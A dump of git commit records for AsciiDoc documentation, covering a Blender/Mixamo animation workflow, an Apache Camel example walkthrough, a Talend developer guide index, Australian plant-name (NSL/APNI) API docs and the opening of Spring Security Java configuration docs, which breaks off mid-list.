`Edit Mode`.\n. Select your model.\nData Tab::\n.. In the `Properties` panel, navigate to the `Data` tab and make sure the `Mesh` has the same name as your model.\nMaterial Tab::\n.. In the `Properties` panel, navigate to the `Material` tab and make sure there is one `Material` in the `Material List` and it is the same name as your model.\n.. In the `Transparency` panel, move the `Alpha` slider to 1.\n+\n[IMPORTANT]\n====\nThere appears to be a bug where the FBX importer adds an `Alpha` map texture to your model. If the `Alpha` slider is not at one, and you use the Blender importer of the SDK, or convert a .blend file, it will be transparent. `Ogre` export is unaffected.\n====\n\n.. Deselect the checkbox of the `Transparency` panel.\nTexture Tab::\n.. In the `Properties` panel, navigate to the `Texture` tab, you will note that your texture has duplicate names in the `Texture List`. The bottom texture is actually a transparent `Alpha` texture and appears to be a bug. Select the *second* texture in the `*Texture List*` to highlight it.\n.. While holding down the kbd:[Shift] key, press the btn:[X] button next to the `*Texture Data Block*` to delete it.\n.. Select your remaining texture in the `Texture List` to highlight it. You will note the `Texture Data Block` is now red due to no texture being assigned.\n.. Click on the btn:[Browse Texture to be linked] button next to the `Texture Data Block` and select your texture.\n.. In the `Image` panel, click the btn:[Small Box] button located next to your texture's path to pack the image file.\n. In the `Info` header, change the layout from `Animation` to `UV Editing`.\n. With your mouse inside the `3d Viewport` and the model still selected, kbd:[Tab] into edit mode. If your model is not completely orange press kbd:[A] untill all vertices are selected. You will see your UV Mapped mesh appear in the `UV Image Editor` window.\n. In the `UV Image Editor`, click the btn:[Browse Image to be linked] button and select your UV image.\n. kbd:[Tab] out of `Edit Mode`.\n. In the `Info` header, change the layout from `UV Editing` to `Default` and then click the btn:[+] button to create a new layout.\n. Rename this new layout `NLA Editing`.\n. Click the `Current Editor Type` button, located at the bottom left (small box) of the `3d Viewport`, and change it from `3d View` to `NLA Editor`. Our TPose action is now visible.\n+\nNOTE: If the action is not visible, navigate to the `Dope Sheet Editor` and from the `Action Editor` context, select the `Action`.\n\n. Click the icon:angle-double-down[] button to push the action down into the stack.\n. Beneath the TPose strip you will see a slider. Drag this slider to the right until your strip is nested up against the left margin of the window.\n. Save your file.\n\n\n== Export\n\n\nYour rigged file is now ready to export. Export your model using one of the xref:jme3\/features#supported-external-file-types,Supported External File Types] of your choice.\n\n\n== Appending Blender Animations\n\nFollow the directions for xref:jme3\/advanced\/mixamo.adoc#mixamo-animations.adoc[Mixamo Animations], xref:jme3\/advanced\/mixamo.adoc#mixamo-download.adoc[Mixamo Download], xref:jme3\/advanced\/mixamo.adoc#creating-blender-animations.adoc[Creating Blender Animations], xref:jme3\/external\/blender.adoc#action-baking[Blender Action Baking] and xref:jme3\/external\/blender\/blender_buffer_clearing#the-linked-action-buffer,Clearing The Linked Action Buffer] for all animations you wish to append to your *rigged* animation file.\n\n. If your `Rigged` file is closed, open it.\n. From the `Info` header, change the Layout to `Default`.\n. In the `3d Viewport`, select the armature of the model.\n. From the `Info` header, select `menu:File[Append]`.\n. Navigate to, and select the `.blend` animation file you want to append.\n. From the folders list select the `Action` folder, followed by your action.\n. When ready, select the btn:[Append From Library] button to finalize your selection.\n. From the `Info` header, change your layout to `Animation`.\n. In the `Dope Sheet Editor`, change the context to `Action Editor` if not already selected.\n. Click the btn:[Action to be linked] button and select your append action from the list.\n. Select the btn:[F] button to save the action.\n. From the `Info` header, change the layout from `Animation` to the `NLA Editing` layout we created in the xref:jme3\/advanced\/mixamo.adoc#creating-the-rigged-animation-file.adoc[Creating The Rigged Animation File] section of this tutorial. You will see your append `Action` at the top of the list.\n. From the `NLA Editor` header, select `menu:Add[Add Tracks]`. A new track has now been added to the top of the list.\n. Click the icon:angle-double-down[] button next to the `Action` to push it down into the stack.\n. btn:[LMB] select the strip to make it the only strip selected.\n. btn:[LMB] drag the selected strip to the right until there is at least a 4 keyframe gap between the furthest strip to the right in the list and the append strip you are dragging.\n+\n[TIP]\n====\nWhen the strip is in drag mode it will be purple. While in drag mode you do not need to keep the btn:[LMB] pressed.\n====\n\n. When you are satisfied with the position, btn:[LMB] click the strip to finalize your selection. Your append strip should now be the furthest strip to the right in the list.\n+\n[TIP]\n====\nYou can use the mouse scroll wheel to shrink or expand the strip window to bring all strips into the view.\n\nYou can drag the slider, at the bottom of the strip window, to the right or left to position the strips against the side of the window.\n====\n\n. With the mouse inside the strip window, press the kbd:[N] key to open the properties window.\n. In the `Active Strip` panel, under `Strip Extents`, you will see the `End Frame` number. In the `Timeline`, set `End:` to this number. Every time you append an `Action` you must increase this number to equal the total length off all strips combined, including the gaps between strips.\n. Save your file.\n\nYour file is now ready to xref:jme3\/advanced\/mixamo#export,export].\n\n[IMPORTANT]\n====\nPrior to export:\n\nIn the `NLA Editor` make sure no `Actions` are waiting to be pushed down into the stack. If there are, it must be removed or made into a strip prior to export.\n\nIn the `Dope Sheet Editor` make sure no `Actions` are selected in the `Action Editor` context. If one is selected, it will be sitting at the top of the `NLA Editor` stack.\n\nAn `Action` that has not been pushed down into the `NLA Stack` will block your `NLA Strip` from playing.\n\nSome export methods bake your actions automatically on export, others don't. Test the animation in-game and if your animations are all messed up, try xref:jme3\/external\/blender.adoc#action-baking[baking them] or use a different exporter.\n====\n\nYour NLA strip should look something like this:\n\nimage::jme3\/advanced\/MixamoNLA.png[MixamoNLA.png,width=\"\",height=\"\"]\n\n\n== Notes\n\n\n* You can see a similar video demonstration of this entire process in xref:jme3.adoc#animations-and-scenes.adoc[Animations And Scenes] under the CadNav icon:long-arrow-right[] Mixamo icon:long-arrow-right[] JME Workflow heading.\n* See xref:tutorials:beginner\/hello_animation.adoc[Hello Animation] and xref:jme3\/advanced\/animation.adoc[Animation in JME3] to learn how to use your animated model.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"3bf02126876d7426a5b5f58dddd3a019c8e5b9a7","subject":"link too source broken (#3599)","message":"link too source broken (#3599)\n\n","repos":"ullgren\/camel,gnodet\/camel,tadayosi\/camel,alvinkwekel\/camel,adessaigne\/camel,christophd\/camel,zregvart\/camel,christophd\/camel,gnodet\/camel,tdiesler\/camel,pmoerenhout\/camel,alvinkwekel\/camel,DariusX\/camel,DariusX\/camel,tadayosi\/camel,pmoerenhout\/camel,adessaigne\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,cunningt\/camel,zregvart\/camel,nikhilvibhav\/camel,tdiesler\/camel,nikhilvibhav\/camel,ullgren\/camel,nicolaferraro\/camel,pmoerenhout\/camel,apache\/camel,pmoerenhout\/camel,christophd\/camel,adessaigne\/camel,tdiesler\/camel,alvinkwekel\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,nicolaferraro\/camel,gnodet\/camel,apache\/camel,alvinkwekel\/camel,apache\/camel,zregvart\/camel,nicolaferraro\/camel,zregvart\/camel,DariusX\/camel,nikhilvibhav\/camel,tdiesler\/camel,pax95\/camel,mcollovati\/camel,mcollovati\/camel,pax95\/camel,DariusX\/camel,apache\/camel,cunningt\/camel,christophd\/camel,apache\/camel,ullgren\/camel,mcollovati\/camel,tdiesler\/camel,mcollovati\/camel,adessaigne\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,tadayosi\/camel,tadayosi\/camel,christophd\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,gnodet\/camel,cunningt\/camel,pmoerenhout\/camel,gnodet\/camel,nicolaferraro\/camel,pax95\/camel,pmoerenhout\/camel,tdiesler\/camel,pax95\/camel,ullgren\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/walk-through-an-example.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/walk-through-an-example.adoc","new_contents":"= Walk through an Example Code\n\nThis mini-guide takes you through the source code of a\nhttps:\/\/github.com\/apache\/camel-examples\/blob\/master\/examples\/camel-example-jms-file\/src\/main\/java\/org\/apache\/camel\/example\/jmstofile\/CamelJmsToFileExample.java[simple\nexample].\n\nCamel can be configured either by using xref:spring.adoc[Spring] or\ndirectly in Java - which\nhttps:\/\/github.com\/apache\/camel-examples\/blob\/master\/examples\/camel-example-jms-file\/src\/main\/java\/org\/apache\/camel\/example\/jmstofile\/CamelJmsToFileExample.java[this\nexample does].\n\nWe start with creating a xref:camelcontext.adoc[CamelContext] - which is\na container for xref:components::index.adoc[Components],\nxref:routes.adoc[Routes]\netc:\n\n[source,java]\n----\n CamelContext context = new DefaultCamelContext();\n----\n\nThere is more than one way of adding a Component to the CamelContext. You can\nadd components implicitly - when we set up the routing - as we do here\nfor the\nxref:components::file-component.adoc[FileComponent]:\n\n[source,java]\n----\ncontext.addRoutes(new RouteBuilder() {\n public void configure() {\n from(\"test-jms:queue:test.queue\").to(\"file:\/\/test\");\n }\n });\n----\n\nor explicitly - as we do here when we add the JMS Component:\n\n[source,java]\n----\nConnectionFactory connectionFactory = new ActiveMQConnectionFactory(\"vm:\/\/localhost?broker.persistent=false\");\n \/\/ Note we can explicit name the component\n context.addComponent(\"test-jms\", JmsComponent.jmsComponentAutoAcknowledge(connectionFactory));\n----\n\nor explicitly using the Component DSL which allows you to configure the components using DSL APIs and register them to the camel context. First you will have the import the maven package for the Component DSL:\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-componentdsl<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\nand the register the component like this:\n[source,java]\n----\nConnectionFactory connectionFactory = new ActiveMQConnectionFactory(\"vm:\/\/localhost?broker.persistent=false\");\n\nComponentsBuilderFactory.jms()\n .connectionFactory(connectionFactory)\n .acknowledgementMode(1)\n .register(context, \"test-jms\");\n----\n\nThe above works with any JMS provider. If we know we are using\nxref:components::activemq-component.adoc[ActiveMQ] we can use an even simpler form using the\nhttp:\/\/activemq.apache.org\/maven\/5.5.0\/activemq-camel\/apidocs\/org\/apache\/activemq\/camel\/component\/ActiveMQComponent.html#activeMQComponent%28java.lang.String%29[`activeMQComponent()`\nmethod] while specifying the\nhttp:\/\/activemq.apache.org\/configuring-transports.html[brokerURL] used\nto connect to ActiveMQ\n\nIn normal use, an external system would be firing messages or events\ndirectly into Camel through one if its xref:components::index.adoc[Components]\nbut we are going to use tha xref:producertemplate.adoc[ProducerTemplate]\nwhich is a really easy way for testing your\nconfiguration:\n\n[source,java]\n----\nProducerTemplate template = context.createProducerTemplate();\n----\n\nNext you *must* start the camel context. If you are using\nxref:spring.adoc[Spring] to configure the camel context this is\nautomatically done for you; though if you are using a pure Java approach\nthen you just need to call the start() method\n\n[source,java]\n----\ncamelContext.start();\n----\n\nThis will start all of the configured routing rules.\n\nSo after starting the xref:camelcontext.adoc[CamelContext], we can fire\nsome objects into\ncamel:\n\n[source,java]\n----\nfor (int i = 0; i < 10; i++) {\n template.sendBody(\"test-jms:queue:test.queue\", \"Test Message: \" + i);\n}\n----\n\n== What happens?\n\nFrom the\nxref:producertemplate.adoc[ProducerTemplate]\n- we send objects (in this case text) into the\nxref:camelcontext.adoc[CamelContext] to the Component\n_test-jms:queue:test.queue_. These text objects will be\nxref:type-converter.adoc[converted automatically] into JMS Messages and\nposted to a JMS Queue named _test.queue_. When we set up the\nxref:routes.adoc[Route], we configured the\nxref:components::file-component.adoc[FileComponent] to listen off the _test.queue_.\n\nThe File xref:components::file-component.adoc[FileComponent] will take messages off the\nQueue, and save them to a directory named _test_. Every message will be\nsaved in a file that corresponds to its destination and message id.\n\nFinally, we configured our own listener in the xref:routes.adoc[Route] -\nto take notifications from the xref:components::file-component.adoc[FileComponent] and print\nthem out as text.\n\n*That's it!*\n\nIf you have the time then use 5 more minutes to\nxref:walk-through-another-example.adoc[Walk through another example]\nthat demonstrates the Spring DSL (XML based) routing.\n","old_contents":"= Walk through an Example Code\n\nThis mini-guide takes you through the source code of a\nhttps:\/\/github.com\/apache\/camel\/blob\/master\/examples\/camel-example-jms-file\/src\/main\/java\/org\/apache\/camel\/example\/jmstofile\/CamelJmsToFileExample.java[simple\nexample].\n\nCamel can be configured either by using xref:spring.adoc[Spring] or\ndirectly in Java - which\nhttps:\/\/github.com\/apache\/camel\/blob\/master\/examples\/camel-example-jms-file\/src\/main\/java\/org\/apache\/camel\/example\/jmstofile\/CamelJmsToFileExample.java[this\nexample does].\n\nWe start with creating a xref:camelcontext.adoc[CamelContext] - which is\na container for xref:components::index.adoc[Components],\nxref:routes.adoc[Routes]\netc:\n\n[source,java]\n----\n CamelContext context = new DefaultCamelContext();\n----\n\nThere is more than one way of adding a Component to the CamelContext. You can\nadd components implicitly - when we set up the routing - as we do here\nfor the\nxref:components::file-component.adoc[FileComponent]:\n\n[source,java]\n----\ncontext.addRoutes(new RouteBuilder() {\n public void configure() {\n from(\"test-jms:queue:test.queue\").to(\"file:\/\/test\");\n }\n });\n----\n\nor explicitly - as we do here when we add the JMS Component:\n\n[source,java]\n----\nConnectionFactory connectionFactory = new ActiveMQConnectionFactory(\"vm:\/\/localhost?broker.persistent=false\");\n \/\/ Note we can explicit name the component\n context.addComponent(\"test-jms\", JmsComponent.jmsComponentAutoAcknowledge(connectionFactory));\n----\n\nor explicitly using the Component DSL which allows you to configure the components using DSL APIs and register them to the camel context. First you will have the import the maven package for the Component DSL:\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-componentdsl<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\nand the register the component like this:\n[source,java]\n----\nConnectionFactory connectionFactory = new ActiveMQConnectionFactory(\"vm:\/\/localhost?broker.persistent=false\");\n\nComponentsBuilderFactory.jms()\n .connectionFactory(connectionFactory)\n .acknowledgementMode(1)\n .register(context, \"test-jms\");\n----\n\nThe above works with any JMS provider. If we know we are using\nxref:components::activemq-component.adoc[ActiveMQ] we can use an even simpler form using the\nhttp:\/\/activemq.apache.org\/maven\/5.5.0\/activemq-camel\/apidocs\/org\/apache\/activemq\/camel\/component\/ActiveMQComponent.html#activeMQComponent%28java.lang.String%29[`activeMQComponent()`\nmethod] while specifying the\nhttp:\/\/activemq.apache.org\/configuring-transports.html[brokerURL] used\nto connect to ActiveMQ\n\nIn normal use, an external system would be firing messages or events\ndirectly into Camel through one if its xref:components::index.adoc[Components]\nbut we are going to use tha xref:producertemplate.adoc[ProducerTemplate]\nwhich is a really easy way for testing your\nconfiguration:\n\n[source,java]\n----\nProducerTemplate template = context.createProducerTemplate();\n----\n\nNext you *must* start the camel context. If you are using\nxref:spring.adoc[Spring] to configure the camel context this is\nautomatically done for you; though if you are using a pure Java approach\nthen you just need to call the start() method\n\n[source,java]\n----\ncamelContext.start();\n----\n\nThis will start all of the configured routing rules.\n\nSo after starting the xref:camelcontext.adoc[CamelContext], we can fire\nsome objects into\ncamel:\n\n[source,java]\n----\nfor (int i = 0; i < 10; i++) {\n template.sendBody(\"test-jms:queue:test.queue\", \"Test Message: \" + i);\n}\n----\n\n== What happens?\n\nFrom the\nxref:producertemplate.adoc[ProducerTemplate]\n- we send objects (in this case text) into the\nxref:camelcontext.adoc[CamelContext] to the Component\n_test-jms:queue:test.queue_. These text objects will be\nxref:type-converter.adoc[converted automatically] into JMS Messages and\nposted to a JMS Queue named _test.queue_. When we set up the\nxref:routes.adoc[Route], we configured the\nxref:components::file-component.adoc[FileComponent] to listen off the _test.queue_.\n\nThe File xref:components::file-component.adoc[FileComponent] will take messages off the\nQueue, and save them to a directory named _test_. Every message will be\nsaved in a file that corresponds to its destination and message id.\n\nFinally, we configured our own listener in the xref:routes.adoc[Route] -\nto take notifications from the xref:components::file-component.adoc[FileComponent] and print\nthem out as text.\n\n*That's it!*\n\nIf you have the time then use 5 more minutes to\nxref:walk-through-another-example.adoc[Walk through another example]\nthat demonstrates the Spring DSL (XML based) routing.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3100ef34e01952afa61ec83ccef610fcc25b946a","subject":"removed several includes from PDF","message":"removed several includes from PDF\n\n(cherry picked from commit 68d76df1eaebcec983e09ba9c2b262444a79c05d)\n","repos":"chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime","old_file":"documentation\/src\/main\/antora\/modules\/ROOT\/pages\/all-in-one.adoc","new_file":"documentation\/src\/main\/antora\/modules\/ROOT\/pages\/all-in-one.adoc","new_contents":"= Talend Component Kit Developer Guide\nv{page-component-version}\n\ninclude::index-getting-started-with-tck.adoc[leveloffset=+1]\n\ninclude::index-setup-environment.adoc[leveloffset=+1]\n\ninclude::index-generating-project.adoc[leveloffset=+1]\n\ninclude::index-creating-components.adoc[leveloffset=+1]\n\ninclude::index-testing-components.adoc[leveloffset=+1]\n\ninclude::index-defining-services.adoc[leveloffset=+1]\n\ninclude::index-deploying-components.adoc[leveloffset=+1]\n","old_contents":"= Talend Component Kit Developer Guide\nv{page-component-version}\n\ninclude::index-getting-started-with-tck.adoc[leveloffset=+1]\n\ninclude::index-setup-environment.adoc[leveloffset=+1]\n\ninclude::index-generating-project.adoc[leveloffset=+1]\n\ninclude::index-creating-components.adoc[leveloffset=+1]\n\ninclude::index-testing-components.adoc[leveloffset=+1]\n\ninclude::index-defining-services.adoc[leveloffset=+1]\n\ninclude::index-deploying-components.adoc[leveloffset=+1]\n\ninclude::index-tutorials.adoc[leveloffset=+1]\n\ninclude::index-reference-guide.adoc[leveloffset=+1]\n\ninclude::documentation-rest.adoc[leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3a5f0fea12a1c7107578fac81588886caf77524a","subject":"Update main.adoc","message":"Update main.adoc","repos":"bio-org-au\/nsl-documentation","old_file":"src\/asciidoc\/toplevel\/main.adoc","new_file":"src\/asciidoc\/toplevel\/main.adoc","new_contents":"= NSL API Documentation\nPeter McNeil <peter@nerderg.com>\nv1.0, June 2015\n:imagesdir: resources\/images\/\n:toc: left\n:toclevels: 4\n:toc-class: toc2\n:icons: font\n:iconfont-cdn: \/\/cdnjs.cloudflare.com\/ajax\/libs\/font-awesome\/4.3.0\/css\/font-awesome.min.css\n:stylesdir: resources\/style\/\n:stylesheet: asciidoctor.css\n:description: Documentation of the National Species List API\n:keywords: documentation, NSL, APNI, API, APC\n:links:\n:numbered:\n\nMain documentation for the NSL API version 1.0\n\n== Introduction\n\n=== Australian Plant Name Index (APNI)\n\nAPNI is a database for the botanical community that deals with the names of Australian plants and their usage in the scientific literature,\nwhether as a current name or synonym. **APNI does not recommend any particular taxonomy or nomenclature.** For a listing of\ncurrently accepted scientific names for the Australian vascular flora, see the <<Australian Plant Census (APC)>>.\nInformation available from APNI includes:\n\n* Scientific plant names;\n* Author details;\n* Original publication details (protologue), with links to a PDF in some cases via a PDF icon\n* Subsequent usage of the name in the scientific literature (in an Australian context)\n* Typification details;\n* An APC tick showing which, if any, concept has been accepted for the APC\n* State distribution (from the Australian Plant Census (APC));\n* Relevant comments and notes;\n* Links to other information such as plant distributions, descriptions and images search via a picture search icon.\n\nAPNI is maintained at the Centre for Australian National Biodiversity Research with staff, resources and financial\nsupport from the Australian National Herbarium, Australian National Botanic Gardens and the Australian Biological\nResources Study. The CANBR, ANBG and ABRS collaborate to further the updating and delivery of APNI and APC.\n\n=== Australian Plant Census (APC)\n\nAPC is a database of the accepted scientific names for the Australian vascular flora, ferns, gymnosperms, hornworts and\nliverworts, both native and introduced, and lists synonyms and misapplications for these names. The APC will cover all\npublished scientific plant names used in an Australian context in the taxonomic literature, but excludes taxa\nknown only from cultivation in Australia. The taxonomy and nomenclature adopted for the APC are\nendorsed by the Council of Heads of Australasian Herbaria (CHAH).\n\nFor further information about names listed in APC, including bibliographic information, secondary references and\ntypification, consult the Australian Plant Name Index (APNI). Alternatively, clicking on hyperlinked names in APC\nsearch results will link to the APNI data for any given name.\n\nInformation available through APC includes:\n\n* Accepted scientific name and author abbreviation(s);\n* Reference to the taxonomic and nomenclatural concept adopted for APC;\n* Synonym(s) and misapplications;\n* State distribution;\n* Relevant comments and notes\n\nAPC is coordinated through a network of contributors, and is maintained by the Centre for Australian National Biodiversity\nResearch with staff, resources and financial support from the Australian National Herbarium, Australian National Botanic\nGardens, Australian Biological Resources Study, CHAH and State and Territory herbaria. These organisations collaborate to\nfurther the updating and delivery of APC.\n\n=== National Species List\n\nThe national Species is a complete database covering vascular plants, mosses, fungi, animals etc. The data for the NSL is\nkept in disparate systems that are combined under the NSL.\n\nThe current NSL infrastructure does this via RDF web services over some semi static datasets, \"but that is changing.\"\nWhat you see here is the start of the new NSL infrastructure that allows the separatly governed datasets to be curated\nby their \"owners\" while combining them into a live discoverable, searchable data resource with a consistent modern\ninterface.\n\nThe new infrastructure takes the existing datasets and makes them \"shards\" of the NSL. Each shard will be imported\nseparately into the new system as resources allow.\n\nThe new system incorporates an improved editing system and separate distributed search services, including linked data\nservices.\n\n==== What we have now\n\nWe have migrated the APNI and APC data into the new NSL system, and they form the first \"shard\". We have largely replaced\nthe old APNI services with the new services, including search and the RDF\/SPARQL interfaces. There are some outputs and\nreports that are noticably missing, but they are being added progressively as resources allow.\n\n==== The road map\n\nWe will be adding new shards to the system as we go:\n\n . Algae\n . Lichen\n . Moss\n . Fungi\n . AFD\n\nAs we add datasets improvements to the Editor and services will be required to cater for differing requirements, these\nchanges will be incorporated based on priorities and resources.\n\n== Using the NSL\n\ninclude::..\/leveltwo\/searching.adoc[]\n\n== Aplication Interfaces (APIs)\n\nThe NSL services provide a number of Application Interfaces, called APIs, to let you access the name data within.\n\ninclude::..\/leveltwo\/rest-objects.adoc[]\n\ninclude::..\/leveltwo\/name-api.adoc[]\n\ninclude::..\/leveltwo\/instance-api.adoc[]\n\ninclude::..\/leveltwo\/reference-api.adoc[]\n\ninclude::..\/leveltwo\/suggestions.adoc[]\n","old_contents":"= NSL API Documentation\nPeter McNeil <peter@nerderg.com>\nv1.0, June 2015\n:imagesdir: resources\/images\/\n:toc: left\n:toclevels: 4\n:toc-class: toc2\n:icons: font\n:iconfont-cdn: \/\/cdnjs.cloudflare.com\/ajax\/libs\/font-awesome\/4.3.0\/css\/font-awesome.min.css\n:stylesdir: resources\/style\/\n:stylesheet: asciidoctor.css\n:description: Documentation of the National Species List API\n:keywords: documentation, NSL, APNI, API, APC\n:links:\n:numbered:\n\nMain documentation for the NSL API version 1.0\n\n== Introduction\n\n=== Australian Plant Name Index (APNI)\n\nAPNI is a database for the botanical community that deals with plant names and their usage in the scientific literature,\nwhether as a current name or synonym. **APNI does not recommend any particular taxonomy or nomenclature.** For a listing of\ncurrently accepted scientific names for the Australian vascular flora, see the <<Australian Plant Census (APC)>>.\nInformation available from APNI includes:\n\n* Scientific plant names;\n* Author details;\n* Original publication details (protologue), with links to a PDF in some cases via a PDF icon\n* Subsequent usage of the name in the scientific literature (in an Australian context)\n* Typification details;\n* An APC tick showing which, if any, concept has been accepted for the APC\n* State distribution (from the Australian Plant Census (APC));\n* Relevant comments and notes;\n* Links to other information such as plant distributions, descriptions and images search via a picture search icon.\n\nAPNI is maintained at the Centre for Australian National Biodiversity Research with staff, resources and financial\nsupport from the Australian National Herbarium, Australian National Botanic Gardens and the Australian Biological\nResources Study. The CANBR, ANBG and ABRS collaborate to further the updating and delivery of APNI and APC.\n\n=== Australian Plant Census (APC)\n\nAPC is a database of the accepted scientific names for the Australian vascular flora, ferns, gymnosperms, hornworts and\nliverworts, both native and introduced, and lists synonyms and misapplications for these names. The APC will cover all\npublished scientific plant names used in an Australian context in the taxonomic literature, but excludes taxa\n(including cultivars) known only from cultivation in Australia. The taxonomy and nomenclature adopted for the APC are\nendorsed by the Council of Heads of Australasian Herbaria (CHAH).\n\nFor further information about names listed in APC, including bibliographic information, secondary references and\ntypification, consult the Australian Plant Name Index (APNI). Alternatively, clicking on hyperlinked names in APC\nsearch results will link to the APNI data for any given name.\n\nInformation available through APC includes:\n\n* Accepted scientific name and author abbreviation(s);\n* Reference to the taxonomic and nomenclatural concept adopted for APC;\n* Synonym(s) and misapplications;\n* State distribution;\n* Relevant comments and notes\n\nAPC is coordinated through a network of contributors, and is maintained by the Centre for Australian National Biodiversity\nResearch with staff, resources and financial support from the Australian National Herbarium, Australian National Botanic\nGardens, Australian Biological Resources Study, CHAH and State and Territory herbaria. These organisations collaborate to\nfurther the updating and delivery of APC.\n\n=== National Species List\n\nThe national Species is a complete database covering vascular plants, mosses, fungi, animals etc. The data for the NSL is\nkept in disparate systems that are combined under the NSL.\n\nThe current NSL infrastructure does this via RDF web services over some semi static datasets, \"but that is changing.\"\nWhat you see here is the start of the new NSL infrastructure that allows the separatly governed datasets to be curated\nby their \"owners\" while combining them into a live discoverable, searchable data resource with a consistent modern\ninterface.\n\nThe new infrastructure takes the existing datasets and makes them \"shards\" of the NSL. Each shard will be imported\nseparately into the new system as resources allow.\n\nThe new system incorporates an improved editing system and separate distributed search services, including linked data\nservices.\n\n==== What we have now\n\nWe have migrated the APNI and APC data into the new NSL system, and they form the first \"shard\". We have largely replaced\nthe old APNI services with the new services, including search and the RDF\/SPARQL interfaces. There are some outputs and\nreports that are noticably missing, but they are being added progressively as resources allow.\n\n==== The road map\n\nWe will be adding new shards to the system as we go:\n\n . Algae\n . Lichen\n . Moss\n . Fungi\n . AFD\n\nAs we add datasets improvements to the Editor and services will be required to cater for differing requirements, these\nchanges will be incorporated based on priorities and resources.\n\n== Using the NSL\n\ninclude::..\/leveltwo\/searching.adoc[]\n\n== Aplication Interfaces (APIs)\n\nThe NSL services provide a number of Application Interfaces, called APIs, to let you access the name data within.\n\ninclude::..\/leveltwo\/rest-objects.adoc[]\n\ninclude::..\/leveltwo\/name-api.adoc[]\n\ninclude::..\/leveltwo\/instance-api.adoc[]\n\ninclude::..\/leveltwo\/reference-api.adoc[]\n\ninclude::..\/leveltwo\/suggestions.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"08f68c9122dfbc2bd60dc438d2f01b884f665e91","subject":"Update JwtAuthenticationConverter Docs","message":"Update JwtAuthenticationConverter Docs\n\nReplaced usage of deprecated API\n\nFixes gh-7062\n","repos":"fhanik\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,fhanik\/spring-security,djechelon\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,jgrandja\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/preface\/java-configuration.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/preface\/java-configuration.adoc","new_contents":"\n[[jc]]\n= Java Configuration\n\nGeneral support for https:\/\/docs.spring.io\/spring\/docs\/3.1.x\/spring-framework-reference\/html\/beans.html#beans-java[Java Configuration] was added to Spring Framework in Spring 3.1.\nSince Spring Security 3.2 there has been Spring Security Java Configuration support which enables users to easily configure Spring Security without the use of any XML.\n\nIf you are familiar with the <<ns-config>> then you should find quite a few similarities between it and the Security Java Configuration support.\n\nNOTE: Spring Security provides https:\/\/github.com\/spring-projects\/spring-security\/tree\/master\/samples\/javaconfig[lots of sample applications] which demonstrate the use of Spring Security Java Configuration.\n\n== Hello Web Security Java Configuration\n\nThe first step is to create our Spring Security Java Configuration.\nThe configuration creates a Servlet Filter known as the `springSecurityFilterChain` which is responsible for all the security (protecting the application URLs, validating submitted username and passwords, redirecting to the log in form, etc) within your application.\nYou can find the most basic example of a Spring Security Java Configuration below:\n\n[[jc-hello-wsca]]\n[source,java]\n----\nimport org.springframework.beans.factory.annotation.Autowired;\n\nimport org.springframework.context.annotation.*;\nimport org.springframework.security.config.annotation.authentication.builders.*;\nimport org.springframework.security.config.annotation.web.configuration.*;\n\n@EnableWebSecurity\npublic class WebSecurityConfig {\n\n\t@Bean\n\tpublic UserDetailsService userDetailsService() {\n\t\tInMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();\n\t\tmanager.createUser(User.withDefaultPasswordEncoder().username(\"user\").password(\"password\").roles(\"USER\").build());\n\t\treturn manager;\n\t}\n}\n----\n\nThere really isn't much to this configuration, but it does a lot.\nYou can find a summary of the features below:\n\n* Require authentication to every URL in your application\n* Generate a login form for you\n* Allow the user with the *Username* _user_ and the *Password* _password_ to authenticate with form based authentication\n* Allow the user to logout\n* https:\/\/en.wikipedia.org\/wiki\/Cross-site_request_forgery[CSRF attack] prevention\n* https:\/\/en.wikipedia.org\/wiki\/Session_fixation[Session Fixation] protection\n* Security Header integration\n** https:\/\/en.wikipedia.org\/wiki\/HTTP_Strict_Transport_Security[HTTP Strict Transport Security] for secure requests\n** https:\/\/msdn.microsoft.com\/en-us\/library\/ie\/gg622941(v=vs.85).aspx[X-Content-Type-Options] integration\n** Cache Control (can be overridden later by your application to allow caching of your static resources)\n** https:\/\/msdn.microsoft.com\/en-us\/library\/dd565647(v=vs.85).aspx[X-XSS-Protection] integration\n** X-Frame-Options integration to help prevent https:\/\/en.wikipedia.org\/wiki\/Clickjacking[Clickjacking]\n* Integrate with the following Servlet API methods\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#getRemoteUser()[HttpServletRequest#getRemoteUser()]\n** 